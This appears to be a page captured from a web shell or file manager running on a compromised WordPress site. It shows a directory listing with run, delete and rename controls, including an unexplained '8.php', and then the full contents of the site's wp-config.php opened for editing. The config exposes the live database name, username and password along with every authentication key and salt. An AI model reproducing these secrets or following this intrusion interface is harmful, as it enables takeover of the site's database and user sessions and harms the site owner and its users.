at path:
ROOT
/
wp-config.php
run:
R
W
Run
.tmb
DIR
2025-11-21 01:38:22
R
W
Run
.well-known
DIR
2026-01-27 06:50:13
R
W
Run
backup
DIR
2025-02-24 09:16:49
R
W
Run
wp-admin
DIR
2026-05-21 12:15:22
R
W
Run
wp-content
DIR
2026-06-09 19:27:31
R
W
Run
wp-includes
DIR
2026-06-09 17:52:04
R
W
Run
.hcflag
29 By
2026-06-09 04:30:16
R
W
Run
Delete
Rename
.htaccess
233 By
2026-06-04 02:18:14
R
W
Run
Delete
Rename
.litespeed_flag
297 By
2026-06-09 01:31:28
R
W
Run
Delete
Rename
8.php
15.05 KB
2026-06-04 02:18:14
R
W
Run
Delete
Rename
error_log
41.27 KB
2026-06-09 19:27:31
R
W
Run
Delete
Rename
google752f16feccdeb4bc.html
53 By
2026-06-09 07:35:28
R
W
Run
Delete
Rename
llms.txt
48.22 KB
2026-06-09 02:49:20
R
W
Run
Delete
Rename
robots.txt
730 By
2026-06-04 06:12:39
R
W
Run
Delete
Rename
wp-activate.php
7.2 KB
2026-05-21 12:15:22
R
W
Run
Delete
Rename
wp-blog-header.php
351 By
2020-02-06 17:03:12
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 23:41:16
R
W
Run
Delete
Rename
wp-config-sample.php
3.26 KB
2025-12-03 12:07:34
R
W
Run
Delete
Rename
wp-config.php
3.15 KB
2025-01-26 19:54:08
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-03 05:10:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-12-03 12:07:33
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-03-11 19:35:16
R
W
Run
Delete
Rename
wp-login.php
50.63 KB
2026-05-21 12:15:21
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-12-03 12:07:33
R
W
Run
Delete
Rename
wp-settings.php
31.88 KB
2026-05-21 12:15:22
R
W
Run
Delete
Rename
wp-signup.php
33.81 KB
2026-05-21 12:15:22
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-12-03 12:07:33
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2025-04-16 08:08:53
R
W
Run
Delete
Rename
error_log
up
📄
wp-config.php
Save
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'bricifpt_brickicondb' ); /** Database username */ define( 'DB_USER', 'bricifpt_brickicondb' ); /** Database password */ define( 'DB_PASSWORD', 'aaua_cms33' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'fB>:3,eP}7TaajgW)GuNwrz!u`wHbf(MiOo!b1~Mq(aE9#C%5 MrKf~beYdEhB[Y' ); define( 'SECURE_AUTH_KEY', ',kl&AC&1d&z3x-AI2h83I!7S9bR0RM{r8=RB[[!CRA^8tS)bxDKc.CoYrzFhj~z5' ); define( 'LOGGED_IN_KEY', 'M,Qql@#IHf<x)eq+ GD6J_k<^gwL%lc 0IN`d>l|DqUw*~b549uM*GH7+$~3nwwp' ); define( 'NONCE_KEY', '0|QDaW#]gyol!dQ|Hw:*ALnHSD:[`1V@sowd.#kypwMhD{GG_~dc} 5**RH6hzD6' ); define( 'AUTH_SALT', 'B:)x#<bG*n:vqJ[Hi^n*+jjeQHX)=JtpHQ}j!ye,(g|$v9tL&y`I]Rotv#[4!Aw<' ); define( 'SECURE_AUTH_SALT', '?kr1]J:Ul/%+zSoy$rPdQq>^jYo3)E`}6vle?Guv`GC)9g~pX(#O{Nv([k-E0{md' ); define( 'LOGGED_IN_SALT', 'SOq<S>>xzO1}/NDu8|vU2eQ k<GLmm3(Hwp|4uO(_2TxL-ej)W4mPs@n+F6M=KEO' ); define( 'NONCE_SALT', '#ajw/=]T lBdT?0liO(E}i[.}nIi}^G+fI~tNQctvE@VYK-{!e8a^1mowUE1>,vt' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';